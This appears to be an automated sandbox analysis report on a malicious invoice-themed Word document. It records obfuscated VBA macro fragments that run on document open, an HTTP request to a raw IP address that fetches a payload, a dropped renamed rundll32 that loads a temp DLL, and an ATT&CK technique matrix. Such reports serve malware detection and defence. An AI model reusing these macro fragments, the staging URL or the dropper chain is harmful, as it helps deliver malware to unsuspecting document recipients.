Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://roaming.edog.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://settings.outlook.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://staging.cortana.ai
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://tasks.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://wus2.contentsync.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: global trafficHTTP traffic detected: GET /fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive

System Summary

barindex
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on W a the top bar, and then click "Enable content'. W O Type here to sear
Source: Screenshot number: 4Screenshot OCR: Enable content'. W O Type here to search Ki E a a g wg m % I i '00% sf ^ 5'58 PM 8/11/2022 C
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeJump to dropped file
Source: wpswireless-invoice-08.11.22.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: wpswireless-invoice-08.11.22.docOLE, VBA macro line: Set = CallByName((), x8flLq("oQMjBoChn9f"), VbGet, )
Source: wpswireless-invoice-08.11.22.docOLE, VBA macro line: Set = CallByName((), x8flLq("nsTo4UOnp"), VbGet, )
Source: wpswireless-invoice-08.11.22.docOLE, VBA macro line: Set = CallByName((x8flLq("Jtmo0biJG8")), x8flLq("Csh99OPh1vt"), VbGet, x8flLq("SRJAAiC8wXlM"))
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE, VBA macro line: Set = CallByName((), x8flLq("oQMjBoChn9f"), VbGet, )
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE, VBA macro line: Set = CallByName((), x8flLq("nsTo4UOnp"), VbGet, )
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE, VBA macro line: Set = CallByName((x8flLq("Jtmo0biJG8")), x8flLq("Csh99OPh1vt"), VbGet, x8flLq("SRJAAiC8wXlM"))
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C4C9B
Source: wpswireless-invoice-08.11.22.docOLE, VBA macro line: Private Sub Document_Open()
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C5C96 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C3F00 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C5D14 NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C3F9E HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: r3F3.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: r3F3.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: r3F3.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wpswireless-invoice-08.11.22.docOLE indicator, VBA macros: true
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe 4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
Source: wpswireless-invoice-08.11.22.docReversingLabs: Detection: 15%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe "C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe" "C:\Users\user\AppData\Local\Temp\y133.tmp.dll",#1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe "C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe" "C:\Users\user\AppData\Local\Temp\y133.tmp.dll",#1
Source: wpswireless-invoice-08.11.22.doc.LNK.0.drLNK file: ..\..\..\..\..\Desktop\wpswireless-invoice-08.11.22.doc
Source: wpswireless-invoice-08.11.22.docOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{D94CDAF8-0BEC-4747-AEC9-53EE215FAF49} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal92.expl.winDOC@3/14@0/1
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C3E1D CoInitializeEx,CLSIDFromString,CoCreateInstance,CoUninitialize,
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C3A94 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCommand line argument: WLDP.DLL
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCommand line argument: localserver
Source: wpswireless-invoice-08.11.22.docOLE document summary: title field not present or empty
Source: wpswireless-invoice-08.11.22.docOLE document summary: author field not present or empty
Source: wpswireless-invoice-08.11.22.docOLE document summary: edited time not present or 0
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFDCA04E6C9BCC80E5.TMP.0.drOLE document summary: edited time not present or 0
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: wpswireless-invoice-08.11.22.docInitial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: wpswireless-invoice-08.11.22.docStatic file information: File size 2350727 > 1048576
Source: Binary string: rundll32.pdb source: r3F3.tmp.exe, r3F3.tmp.exe, 00000003.00000000.285193260.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, r3F3.tmp.exe.0.dr
Source: Binary string: rundll32.pdbGCTL source: r3F3.tmp.exe, 00000003.00000000.285193260.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, r3F3.tmp.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C68E0 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C6989 push ecx; ret
Source: r3F3.tmp.exe.0.drStatic PE information: section name: .didat
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C2512 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C6C10 GetLastError,SetLastError,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C3D9F mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C6580 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C6232 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeCode function: 3_2_000C6783 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2
Command and Scripting Interpreter
Path Interception1
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts12
Scripting
Boot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Disable or Modify Tools
LSASS Memory2
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts42
Exploitation for Client Execution
Logon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
Scripting
NTDS3
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer11
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Extra Window Memory Injection
Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
wpswireless-invoice-08.11.22.doc15%ReversingLabsScript-Macro.Trojan.Amphitryon
wpswireless-invoice-08.11.22.doc100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFDCA04E6C9BCC80E5.TMP100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rmP0%Avira URL Cloudsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm0%Avira URL Cloudsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rmfalse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
    high
    https://login.microsoftonline.com/63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
      high
      https://shell.suite.office.com:144363CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drfalse
        high
